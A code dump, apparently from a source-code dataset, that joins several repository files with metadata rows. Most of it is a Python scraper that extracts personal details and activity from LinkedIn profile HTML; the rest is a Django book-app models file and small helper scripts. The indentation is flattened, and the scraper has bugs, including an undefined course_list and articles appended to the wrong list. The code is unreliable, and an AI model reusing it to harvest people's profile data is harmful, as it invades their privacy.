resumes_pool.append(resume_text.replace('publication description\n', ''))
#print 'Resume\n' + str(resume_text)
# Get publication links
#print 'Links:'
#links_html = publis_block[n].findAll('a', href=True)
links_html = item.findAll('a', href=True)
publi_links = []
if links_html:
for m in range(0, len(links_html)):
link_text = links_html[m]['href']
if link_text not in publi_links:
#print str(link_text.encode('utf-8'))
publi_links.append(link_text)
links_pool.append(publi_links)
publications_data.append(titles_pool)
publications_data.append(dates_pool)
publications_data.append(journals_pool)
publications_data.append(resumes_pool)
publications_data.append(links_pool)
return publications_data
def get_certifications_data(web_html):
'''Recieves a LinkedIn profile html and returns a list with the certifications information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Certification titles
[1] : Dates of certification
[2] : Issuing entities
'''
titles_pool = []
dates_pool = []
entities_pool = []
certifications_pool = []
class_labels = ['pv-accomplishments-block__list ',
'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
certifications_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block certifications pv-accomplishments-block--expanded ember-view'})
for i in range(0, len(class_labels)):
certifications_list = certifications_section.find('ul', attrs={'class':class_labels[i]})
if certifications_list:
break
if not certifications_list:
print ('ERROR: certifications_list not found.')
print ('Other uls found:')
all_uls = certifications_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in certifications_list.children:
if len(child) > 1:
item = BeautifulSoup(str(child), "html.parser")
# Get title
title_text = ''
title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
if title_html:
title_text = title_html.text.strip()
titles_pool.append(title_text.replace('Title', ''))
# Get date
date_text = ''
date_html = item.find('p', attrs={'class':'pv-accomplishment-entity__subtitle'})
if date_html:
date_text = date_html.text.strip()
dates_pool.append(date_text.replace('Certification Date' ,''))
# Get certification entity
entity_text = ''
entity_html = item.find('a', attrs={'name':'certification_detail_company'})
if entity_html:
entity_text = entity_html.text.strip()
entities_pool.append(entity_text)
certifications_pool.append(titles_pool)
certifications_pool.append(dates_pool)
certifications_pool.append(entities_pool)
return certifications_pool
def get_honors_data(web_html):
'''Recieves a LinkedIn profile html and returns a list with the honors and awards information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Awards titles
[1] : Dates of awards
[2] : Issuing entities
[3] : Resumes of awards
'''
titles_pool = []
dates_pool = []
entities_pool = []
resumes_pool = []
honors_pool = []
class_labels = ['pv-accomplishments-block__list ',
'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
honors_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block honors pv-accomplishments-block--expanded ember-view'})
for i in range(0, len(class_labels)):
honors_list = honors_section.find('ul', attrs={'class':class_labels[i]})
if honors_list:
break
if not honors_list:
print ('ERROR: honors_list not found.')
print ('Other uls found:')
all_uls = honors_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in honors_list.children:
if len(child) > 1:
item = BeautifulSoup(str(child), 'html.parser')
# Get title
title_text = ''
title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
if title_html:
title_text = title_html.text.strip()
titles_pool.append(title_text.replace('honor title', ''))
# Get date
date_text = ''
date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__date'})
if date_html:
date_text = date_html.text.strip()
dates_pool.append(date_text.replace('honor date', ''))
# Get entity
entity_text = ''
entity_html = item.find('span', attrs={'class':'pv-accomplishment-entity__issuer'})
if entity_html:
entity_text = entity_html.text.strip()
entities_pool.append(entity_text.replace('honor issuer', ''))
# Get resume
resume_text = ''
resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
if resume_html:
resume_text = resume_html.text.strip()
resumes_pool.append(resume_text.replace('honor description', ''))
honors_pool.append(titles_pool)
honors_pool.append(dates_pool)
honors_pool.append(entities_pool)
honors_pool.append(resumes_pool)
return honors_pool
def get_languages_data(web_html):
'''Recieves a LinkedIn profile html and returns a list with the languages information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Languages
[1] : Languages profiency
'''
languages_pool = []
proficiency_pool = []
languages_data = []
class_labels = ['pv-accomplishments-block__list ',
'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
languages_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block languages pv-accomplishments-block--expanded ember-view'})
for i in range(0, len(class_labels)):
languages_list = languages_section.find('ul', attrs={'class':class_labels[i]})
if languages_list:
break
if not languages_list:
print ('ERROR: languages_list not found.')
print ('Other uls found:')
all_uls = languages_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in languages_list.children:
if len(child) > 1:
item = BeautifulSoup(str(child), 'html.parser')
# Get language
language_text = ''
language_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
if language_html:
language_text = language_html.text.strip()
languages_pool.append(language_text.replace('Language name', ''))
# Get proficiency
proficiency_text = ''
proficiency_html = item.find('p', attrs={'class':'pv-accomplishment-entity__proficiency pv-accomplishment-entity__subtitle'})
if proficiency_html:
proficiency_text = proficiency_html.text.strip()
proficiency_pool.append(proficiency_text)
languages_data.append(languages_pool)
languages_data.append(proficiency_pool)
return languages_data
def get_organizations_data(web_html):
'''Recieves a LinkedIn profile html and returns a list with the organizations to which the candidate belongs to.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Organization names
[1] : Dates at which the the candidate had belong to those organizations
[2] : Positions inside the organizations
'''
names_pool = []
dates_pool = []
positions_pool = []
organizations_data = []
class_labels = ['pv-accomplishments-block__list ',
'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
organization_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block organizations pv-accomplishments-block--expanded ember-view'})
for i in range(0, len(class_labels)):
organization_list = organization_section.find('ul', attrs={'class':class_labels[i]})
if organization_list:
break
if not organization_list:
print ('ERROR: organization_list not found.')
print ('Other uls found:')
all_uls = organization_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in organization_list.children:
if len(child) > 1:
# Create the html item
item = BeautifulSoup(str(child), 'html.parser')
# Get the name
name_text = ''
name_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
if name_html:
name_text = name_html.text.strip()
names_pool.append(name_text)
# Get the dates
date_text = ''
date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__subtitle'})
if date_html:
date_text = date_html.text.strip()
dates_pool.append(date_text.replace('organization date', ''))
# Get the position in the organization
position_text = ''
position_html = item.find('span', attrs={'class':'pv-accomplishment-entity__position'})
if position_html:
position_text = position_html.text.strip()
positions_pool.append(position_text.replace('organization position', ''))
organizations_data.append(names_pool)
organizations_data.append(dates_pool)
organizations_data.append(positions_pool)
return organizations_data
def get_patents_data(web_html):
'''Recieves a LinkedIn profile html and returns a list with the patents information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Patent titles
[1] : Dates of patents
[2] : Patents references
[3] : Resumes of patents
'''
titles_pool = []
dates_pool = []
references_pool = []
resumes_pool = []
all_patents = []
class_labels = ['pv-accomplishments-block__list ',
'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
patents_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block patents pv-accomplishments-block--expanded ember-view'})
for i in range(0, len(class_labels)):
patents_list = patents_section.find('ul', attrs={'class':class_labels[i]})
if patents_list:
break
if not patents_list:
print ('ERROR: patents_list not found.')
print ('Other uls found:')
all_uls = patents_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in patents_list.children:
if len(child) > 1:
# Create html item
item = BeautifulSoup(str(child), 'html.parser')
# Get title
title_text = ''
title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
if title_html:
title_text = title_html.text.strip()
titles_pool.append(title_text.replace('Patent title', ''))
# Get the date
date_text = ''
date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__date'})
if date_html:
date_text = date_html.text.strip()
dates_pool.append(date_text.replace('Patent date', ''))
# Get patent reference number
reference_text = ''
reference_html = item.find('span', attrs={'class':'pv-accomplishment-entity__issuer'})
if reference_html:
reference_text = reference_html.text.strip()
references_pool.append(reference_text.replace('Patent issuer and number', ''))
# Get the resume
resume_text = ''
resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
if resume_html:
resume_text = resume_html.text.strip()
resumes_pool.append(resume_text.replace('Patent description', ''))
all_patents.append(titles_pool)
all_patents.append(dates_pool)
all_patents.append(references_pool)
all_patents.append(resumes_pool)
return all_patents
def get_projects_data(web_html):
'''Recieves a LinkedIn profile html and returns a list with the projects information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Projects titles
[1] : Dates of projects
[2] : Resumes of projects
[3] : Links of projects
'''
titles_pool = []
dates_pool = []
resumes_pool = []
links_pool = []
all_projects = []
class_labels = ['pv-accomplishments-block__list ',
'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
projects_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block projects pv-accomplishments-block--expanded ember-view'})
#projects_list = projects_section.find('ul', attrs={'class':'pv-accomplishments-block__list '})
for i in range(0, len(class_labels)):
projects_list = projects_section.find('ul', attrs={'class':class_labels[i]})
if projects_list:
break
if not projects_list:
print ('ERROR: projects_list not found.')
print ('Other uls found:')
all_uls = projects_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in projects_list.children:
if len(child) > 1:
# Create html item
item = BeautifulSoup(str(child), 'html.parser')
# Get title
title_text = ''
title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
if title_html:
title_text = title_html.text.strip()
titles_pool.append(title_text.replace('Project name', ''))
# Get date
date_text = ''
date_html = item.find('p', attrs={'class':'pv-accomplishment-entity__date pv-accomplishment-entity__subtitle'})
if date_html:
date_text = date_html.text.strip()
dates_pool.append(date_text)
# Get resume
resume_text = ''
resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
if resume_html:
resume_text = resume_html.text.strip()
if resume_text == '':
resume_text = item.text.strip()
resumes_pool.append(resume_text)
# Get links
project_links = []
link_text = ''
links_html = item.findAll('a', href=True)
if links_html:
for link in links_html:
link_text = link['href']
if link_text not in project_links:
project_links.append(link_text)
links_pool.append(project_links)
all_projects.append(titles_pool)
all_projects.append(dates_pool)
all_projects.append(resumes_pool)
all_projects.append(links_pool)
return all_projects
def get_course_data(web_html):
'''Recieves a LinkedIn profile html and returns a list with the courses information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Courses titles
[1] : Other information about the courses
'''
titles_pool = []
extras_pool = []
all_courses = []
class_labels = ['pv-accomplishments-block__list ',
'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
course_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block courses pv-accomplishments-block--expanded ember-view'})
for i in range(0, len(class_labels)):
projects_list = course_section.find('ul', attrs={'class':class_labels[i]})
if course_list:
break
if not course_list:
print ('ERROR: course_list not found.')
print ('Other uls found:')
all_uls = course_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in course_list.children:
if len(child) > 1:
# Create html item
item = BeautifulSoup(str(child), 'html.parser')
# Get title
title_text = ''
title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
if title_html:
title_text = title_html.text.strip()
titles_pool.append(title_text.replace('Course name', ''))
# Get extra info
extra_text = ''
extra_html = item.find('p', attrs={'class':'pv-accomplishment-entity__course-number pv-accomplishment-entity__subtitle'})
if extra_html:
extra_text = extra_html.text.strip()
extras_pool.append(extra_text.replace('Course number', ''))
all_courses.append(titles_pool)
all_courses.append(extras_pool)
return all_courses
def get_test_scores_data(web_html):
'''Recieves a LinkedIn profile html and returns a list with the scorers information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Titles
[1] : Dates
[2] : Scorers
[3] : Resumes of scorers
'''
titles_pool = []
dates_pool = []
scorers_pool = []
resumes_pool = []
all_scorers = []
class_labels = ['pv-accomplishments-block__list ',
'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
scorers_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block test-scores pv-accomplishments-block--expanded ember-view'})
for i in range(0, len(class_labels)):
scorers_list = scorers_section.find('ul', attrs={'class':class_labels[i]})
if scorers_list:
break
if not scorers_list:
print ('ERROR: scorers_list not found.')
print ('Other uls found:')
all_uls = scorers_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in scorers_list.children:
if len(child) > 1:
# Create html item
item = BeautifulSoup(str(child), 'html.parser')
# Get title
title_text = ''
title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
if title_html:
title_text = title_html.text.strip()
titles_pool.append(title_text.replace('Test name', ''))
# Get date
date_text = ''
date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__date'})
if date_html:
date_text = date_html.text.strip()
date_broken = date_text.split('\n')
date_text = date_broken[1]
dates_pool.append(date_text)
# Get scorers
scorer_text = ''
scorer_html = item.find('span', attrs={'class':'pv-accomplishment-entity__score'})
if scorer_html:
scorer_text = scorer_html.text.strip()
scorers_pool.append(scorer_text)
# Get resume
resume_text = ''
resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
if resume_html:
resume_text = resume_html.text.strip()
resumes_pool.append(resume_text)
all_scorers.append(titles_pool)
all_scorers.append(dates_pool)
all_scorers.append(scorers_pool)
all_scorers.append(resumes_pool)
return all_scorers
def get_interests_from_profile(web_html):
'''Recieves a LinkedIn profile html and returns a list with the interests.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Interests titles
[1] : Interests number of followers
'''
interest_followers = []
interests = []
followers = []
interests_block_html = web_html.find('section', attrs={'class':'pv-profile-section pv-interests-section artdeco-container-card ember-view'})
interests_html = interests_block_html.findAll('li', attrs={'class':'pv-interest-entity pv-profile-section__card-item ember-view'})
for i in range(0, len(interests_html)):
interest_name_html = interests_html[i].find('h3', attrs={'class':'pv-entity__summary-title Sans-17px-black-85%-semibold'})
interest_name_text = interest_name_html.text.strip()
interests.append(interest_name_text)
#print interest_name_text
followers_html = interests_html[i].find('p', attrs={'class':'pv-entity__follower-count Sans-15px-black-55%'})
followers_text = followers_html.text.strip()
no_followers = followers_text.replace('followers', '')
no_follower = no_followers.replace('follower', '')
no_members = no_follower.replace('members', '')
no_member = no_members.replace('member', '')
no_space = no_member.replace(' ', '')
no_coma = no_space.replace(',', '')
#print no_coma
followers.append(no_coma)
#print ''
interest_followers.append(interests)
interest_followers.append(followers)
return interest_followers
def interest_pages(web_html):
## Check the docs
'''Checks if there are more interests'''
extra_interests = False
match = re.search(r'/detail/interests/' , str(web_html))
if match:
extra_interests = True
return extra_interests
def get_extra_interests(web_html):
'''Recieves the html of the expanded see all interests and returns a list with the interests and the number of followers.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Interests titles
[1] : Interests number of followers
'''
interest_followers = []
interests = []
followers = []
interests_block_html = web_html.findAll('li', attrs={'class':' entity-list-item'})
if interests_block_html:
for i in range(0, len(interests_block_html)):
interest_name_html = interests_block_html[i].find('span', attrs={'class':'pv-entity__summary-title-text'})
interest_name_text = interest_name_html.text.strip()
#print interest_name_text.encode('utf-8')
interests.append(interest_name_text)
followers_html = interests_block_html[i].find('p', attrs={'class':'pv-entity__follower-count Sans-15px-black-55%'})
followers_text = followers_html.text.strip()
no_followers = followers_text.replace('followers', '')
no_follower = no_followers.replace('follower', '')
no_members = no_follower.replace('members', '')
no_member = no_members.replace('member', '')
no_space = no_member.replace(' ', '')
no_coma = no_space.replace(',', '')
followers.append(no_coma)
#print no_coma.encode('utf-8')
interest_followers.append(interests)
interest_followers.append(followers)
return interest_followers
def get_posts(web_html):
'''Recieves a LinkedIn profile activity information, returns a list of the articles, posts and liked posts shown.
The function identifies the posts and sends the posts html to the function analyse_post.
The three lists return content the information extracted by analyse_post.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Articles written
[0] : Post text
[1] : Post titles
[2] : Shared link
[3] : Number of likes
[4] : Number of comments
[1] : Posts written
[0] : Post text
[1] : Post titles
[2] : Shared link
[3] : Number of likes
[4] : Number of comments
[2] : Liked posts
[0] : Post text
[1] : Post titles
[2] : Shared link
[3] : Number of likes
[4] : Number of comments
'''
articles_labels = [ 'feed-base-update mh0 Elevation-2dp relative feed-base-update--reshare reshare-update ember-view',
'feed-base-update mh0 Elevation-2dp relative feed-base-update--channel channel-update article ember-view',
'feed-base-update mh0 Elevation-2dp relative feed-base-update--viral viral-update article ember-view']
articles_pool = []
posts_pool = []
liked_pool = []
all_activity = []
articles_flag = False
posts_flag = False
liked_posts_flag = False
name_html = web_html.find('span', attrs={'class':'hoverable-link-text'})
if name_html:
name_text = name_html.text.strip()
voyager_feed = web_html.find('div', attrs={'class':'pv-recent-activity-detail__feed-container feed-container-theme ember-view'})
if voyager_feed:
articles_stack = voyager_feed.find_all('article')
print ('Number of activity posts: ' + str(len(articles_stack)))
for i in range(0, len(articles_stack)):
if 'mh0' in articles_stack[i]['class']:
bar_html = articles_stack[i].find('div', attrs={'class':'feed-base-top-bar Sans-13px-black-70% ember-view'})
if bar_html:
breaken_bar = bar_html.text.strip().split(' ')
if ('likes' in breaken_bar) or ('liked' in breaken_bar):
# This are liked posts
liked_posts_flag = True
liked_post = analyse_post(articles_stack[i])
liked_pool.append(liked_post)
if 'commented' in breaken_bar:
# This is a commented post (not been retrieved at the moment)
pass
if 'replied' in breaken_bar:
# This is a replied to a comment (not been retrieved at the moment)
pass
if not bar_html:
# Get source
source_text = ''
#source_html = articles_stack[i].find('h3', attrs={'class':'feed-s-image-description__byline Sans-13px-black-55%'})
source_html = articles_stack[i].find('h3', attrs={'class':'feed-base-image-description__byline Sans-13px-black-55%'})
if source_html:
source_text = source_html.text.strip()
if source_text:
source_no_linkedin = source_text.replace(' on LinkedIn', '')
if source_no_linkedin == name_text:
# This are articles written by the candidate
articles_flag = True
article = analyse_post(articles_stack[i])
articles_stack.append(article)
if source_no_linkedin != name_text:
# This is a post
posts_flag = True
post = analyse_post(articles_stack[i])
posts_pool.append(post)
if source_text == '':
# This are also posts
post = analyse_post(articles_stack[i])
posts_pool.append(post)
if articles_flag == False:
empty_article = ['NULL', 'NULL', 'NULL', 'NULL', 'NULL']
articles_pool.append(empty_article)
if posts_flag == False:
empty_post = ['NULL', 'NULL', 'NULL', 'NULL', 'NULL']
posts_pool.append(empty_post)
if liked_posts_flag == False:
empty_like = ['NULL', 'NULL', 'NULL', 'NULL', 'NULL']
liked_pool.append(empty_like)
all_activity.append(articles_pool)
all_activity.append(posts_pool)
all_activity.append(liked_pool)
return all_activity
def analyse_post(post_html):
'''Recieves the html of a post, returns information about that post.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Post text
[1] : Post titles
[2] : Shared link
[3] : Number of likes
[4] : Number of comments
'''
texts_pool = []
titles_pool = []
sources_pool = []
likes_pool = []
comments_pool = []
post_data = []
#all_divis = post_html.find_all('div')
#for i in range(0, len(all_divis)):
# try:
# print (all_divis[i]['class'])
# except:
# pass
labels_pool = [ 'feed-s-update__description feed-s-inline-show-more-text ember-view',
'feed-base-update__description feed-base-inline-show-more-text ember-view',
'feed-base-update__description feed-base-inline-show-more-text is-empty ember-view',
'feed-base-inline-show-more-text is-empty ember-view',
'feed-base-inline-show-more-text ember-view']
# Get text
text = 'NULL'
for i in range(0, len(labels_pool)):
text_html = post_html.find('div', attrs={'class':labels_pool[i]})
if text_html:
item_text = text_html.text.strip()
if item_text:
text = unicodetoascii(item_text)
break
if text == 'NULL':
text_html = post_html.find('p', attrs={'class':'feed-base-main-content--mini-update Sans-15px-black-70% feed-base-main-content ember-view'})
if text_html:
item_text = text_html.text.strip()
if item_text:
text = unicodetoascii(item_text)
original_html = post_html.find('span', attrs={'data-control-name':'original_share'})
if original_html:
original_text = original_html.text.strip()
if item_text:
text = unicodetoascii(original_text)
texts_pool.append(text)
# Title shared
title_text = 'NULL'
title_html = post_html.find('h2', attrs={'class':'feed-base-image-description__headline Sans-15px-black-85%-semibold'})
if title_html:
title_text = title_html.text.strip()
title_text = unicodetoascii(title_text)
titles_pool.append(title_text)
# Get source
source_text = 'NULL'
source_html = post_html.find('h3', attrs={'class':'feed-base-image-description__byline Sans-13px-black-55%'})
if source_html:
source_text = source_html.text.strip()
source_text = unicodetoascii(source_text)
sources_pool.append(source_text)
# Get number of likes and number of comments
likes_number = '0'
likes_html = post_html.find('button', attrs={'class':'feed-base-social-counts__num-likes feed-base-social-counts__count-value Sans-13px-black-55% hoverable-link-text'})
if likes_html:
like_spans = likes_html.find_all('span')
likes_text = like_spans[0].text.strip()
likes_number = re.findall('\d+', str(likes_text))[0]
comments_number = '0'
comments_html = post_html.find('button', attrs={'class':'feed-base-social-counts__num-comments feed-base-social-counts__count-value Sans-13px-black-55% hoverable-link-text'})
if comments_html:
comment_spans = comments_html.find_all('span')
comment_text = comment_spans[0].text.strip()
comments_number = re.findall('\d+', str(comment_text))[0]
numbers_block = post_html.find('ul', attrs={'class':'feed-s-social-counts ember-view'})
if numbers_block:
for item in numbers_block.children:
if len(item) > 1:
cosa = BeautifulSoup(str(item), 'html.parser')
button_html = cosa.find('button')
span_one = button_html.find('span')
span_text = span_one.text.strip()
span_broken = span_text.split(' ')
span_number = span_broken[0].replace(',', '')
if button_html['data-control-name'] == 'likes_count':
likes_number = span_number
if button_html['data-control-name'] == 'comments_count':
comments_number = span_number
likes_pool.append(likes_number)
comments_pool.append(comments_number)
post_data.append(text)
post_data.append(title_text)
post_data.append(source_text)
post_data.append(likes_number)
post_data.append(comments_number)
return post_data
def get_followers_number(web_html):
'''Recieves a LinkedIn profile activity html returns the number of followers.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
str
Number of followers, NULL if none.
'''
followers_number = '0'
side_box = web_html.find('aside', attrs={'class':'pv-recent-activity-detail__left-rail left-rail'})
if side_box:
followers_html = side_box.find('p', attrs={'class':'pv-recent-activity-top-card__follower-count Sans-15px-black-70%'})
if followers_html:
followers_text = followers_html.text.strip()
no_followers = followers_text.replace('Followers', '')
no_follower = no_followers.replace('Follower', '')
followers_number = str(no_follower)
return followers_number
def unicodetoascii(text):
# http://www.utf8-chartable.de/unicode-utf8-table.pl?start=8192&number=128&utf8=string-literal
TEXT = (text.
replace('\\n', ' ').
replace('\\xe2\\x80\\x99', "'").
replace('\xe2\x80\x99', "'").
replace('\\xc3\\xa9', 'e').
replace('\xc3\xa9', 'e').
replace('\\xe2\\x80\\x90', '-').
replace('\xe2\x80\x90', '-').
replace('\\xe2\\x80\\x91', '-').
replace('\xe2\x80\x91', '-').
replace('\\xe2\\x80\\x92', '-').
replace('\xe2\x80\x92', '-').
replace('\\xe2\\x80\\x93', '-').
replace('\xe2\x80\x93', '-').
replace('\\xe2\\x80\\x94', '-').
replace('\xe2\\x80\x94', '-').
replace('\\xe2\\x80\\x98', "'").
replace('\xe2\x80\x98', "'").
replace('\\xe2\\x80\\x99', "'").
replace('\xe2\x80\x99', "'").
replace('\\xe2\\x80\\x9b', "'").
replace('\xe2\x80\x9b', "'").
replace('\\xe2\\x80\\x9c', '"').
replace('\xe2\x80\x9c', '"').
replace('\\xe2\\x80\\x9d', '"').
replace('\xe2\x80\x9d', '"').
replace('\\xe2\\x80\\x9e', '"').
replace('\xe2\x80\x9e', '"').
replace('\\xe2\\x80\\x9f', '"').
replace('\xe2\x80\x9f', '"').
replace('\\xe2\\x80\\xa6', '...').
replace('\xe2\x80\xa6', '...').
replace('\\xe2\\x80\\xb2', "'").
replace('\xe2\x80\xb2', "'").
replace('\\xe2\\x80\\xb3', "'").
replace('\xe2\x80\xb3', "'").
replace('\\xe2\\x80\\xb4', "'").
replace('\xe2\x80\xb4', "'").
replace('\\xe2\\x80\\xb5', "'").
replace('\xe2\x80\xb5', "'").
replace('\\xe2\\x80\\xb6', "'").
replace('\xe2\x80\xb6', "'").
replace('\\xe2\\x80\\xb7', "'").
replace('\xe2\x80\xb7', "'").
replace('\\xe2\\x81\\xba', "+").
replace('\xe2\x81\xba', "+").
replace('\\xe2\\x81\\xbb', "-").
replace('\xe2\x81\xbb', "-").
replace('\\xe2\\x81\\xbc', "=").
replace('\xe2\x81\xbc', "=").
replace('\\xe2\\x81\\xbd', "(").
replace('\xe2\x81\xbd', "(").
replace('\\xe2\\x81\\xbe', ")").
replace('\xe2\x81\xbe', ")").
replace('\\xc2\\xa0', "").
replace('\xc2\xa0', "").
replace('\n', ' ').
replace('\\', '')
)
while ' ' in TEXT:
TEXT = TEXT.replace(' ', ' ')
if TEXT[0] == ' ':
TEXT = TEXT[1:]
try:
if TEXT[-1] == ' ':
TEXT = TEXT[:-1]
except:
pass
return TEXT
if __name__=="__main__":
print ('Hi') | [
"javierpascualr@gmail.com"
] | javierpascualr@gmail.com |
16d0afee5579f5327094a63c8498acf5c907d634 | ddcd523c50aabf23cea5f409036499b5fa4859df | /book/models.py | 2445ad754ce9c3aca7a3e30754f7d731fcb4eae5 | [] | no_license | nadyrbek97/kitep_back | 6edb7ea7255bb697777535bff0b9474821c2361b | 8691a75538711bdd8070a6f3351cd4a17ec70f00 | refs/heads/master | 2023-04-29T14:15:38.710373 | 2019-07-07T15:06:56 | 2019-07-07T15:06:56 | 192,690,079 | 0 | 0 | null | 2023-04-21T20:32:40 | 2019-06-19T08:21:18 | CSS | UTF-8 | Python | false | false | 3,514 | py | from django.db import models
from django.urls import reverse
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
from . import choices
class Writer(models.Model):
full_name = models.CharField(max_length=250)
def __str__(self):
return self.full_name
class Category(models.Model):
title = models.CharField(max_length=250)
class Meta:
verbose_name_plural = "Categories"
def __str__(self):
return self.title
class SubCategory(models.Model):
title = models.CharField(max_length=250)
main_genre = models.ForeignKey(Category,
on_delete=models.CASCADE,
related_name="subcategories")
class Meta:
verbose_name_plural = "Sub Categories"
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('sub-category-detail', kwargs={'pk': self.pk})
class Collection(models.Model):
title = models.CharField(max_length=500)
image = models.ImageField(upload_to="collection_images")
def __str__(self):
return "{} ({})".format(self.title, str(self.books.count()))
class Book(models.Model):
title = models.CharField(max_length=250)
description = models.TextField()
pages = models.PositiveIntegerField(default=0,
verbose_name='page')
amount = models.PositiveIntegerField(default=0)
price = models.PositiveIntegerField(default=0)
language = models.CharField(max_length=20,
default='English',
choices=choices.BOOK_LANGUAGE)
published_year = models.CharField(max_length=10)
image = models.ImageField(upload_to="book_images",
default="book_images/default.png",
blank=True)
file = models.FileField(upload_to="book_files",
null=True)
writer = models.ForeignKey(Writer,
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="books")
sub_category = models.ManyToManyField(SubCategory,
related_name="books")
collection = models.ForeignKey(Collection,
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="books")
tags = TaggableManager()
likes = models.ManyToManyField(User,
related_name="book_likes",
blank=True)
def __str__(self):
return self.title + "(" + self.published_year + ")"
def get_absolute_url(self):
return reverse('book-detail', kwargs={'pk': self.pk})
class Comment(models.Model):
book = models.ForeignKey(Book,
on_delete=models.CASCADE,
related_name="comments")
user = models.ForeignKey(User,
on_delete=models.CASCADE,
related_name="comments")
body = models.TextField()
created = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ('created', )
def __str__(self):
return "Comment by {} on {}".format(self.user.username, self.book.title)
| [
"nadyrbek97@gmail.com"
] | nadyrbek97@gmail.com |
541e437fb4ea37f3049fb19b4f1687b8576a3ff7 | b9ffd9b9e88d497ee904e42dfd825080ee7713a9 | /files_from_working_server/waterscan-api/venv/bin/virtualenv | a6ba8866dbc0c5dce7c6083a719ce94eacc20629 | [] | no_license | naturalis/waterscan-ecosoft | a3d8e91d6634108b585a71c051f15216c8c3fdf4 | a2bcc3e656bbfb6ca08cd7e8ef7f119f0004d049 | refs/heads/master | 2021-06-15T05:26:15.457593 | 2019-06-21T09:39:22 | 2019-06-21T09:39:22 | 191,738,087 | 0 | 0 | null | 2021-05-06T19:36:36 | 2019-06-13T10:01:34 | Python | UTF-8 | Python | false | false | 239 | #!/home/ubuntu/waterscan-api/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from virtualenv import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"martenhoogeveen@gmail.com"
] | martenhoogeveen@gmail.com | |
23d620c4b360e8d3af9b8c9bca1267847ffdc581 | d9a720e7e550579578ba66ee9135b3d4d333dc53 | /fabfile.py | f586cc4beaedbf96beb8679ceb720079aa883a6c | [] | no_license | fromageball/taxi | 7a99d46d7901322f9f103a6311f1600c5f74ac8b | aaba5673a27b0185f9519d9b8ee81633dfe6b81d | refs/heads/master | 2020-05-17T00:14:57.483690 | 2013-08-06T01:34:50 | 2013-08-06T01:34:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | true | false | 36 | py | def hello():
print("Hello world!")
| [
"fromageball2@ps200061.dreamhostps.com"
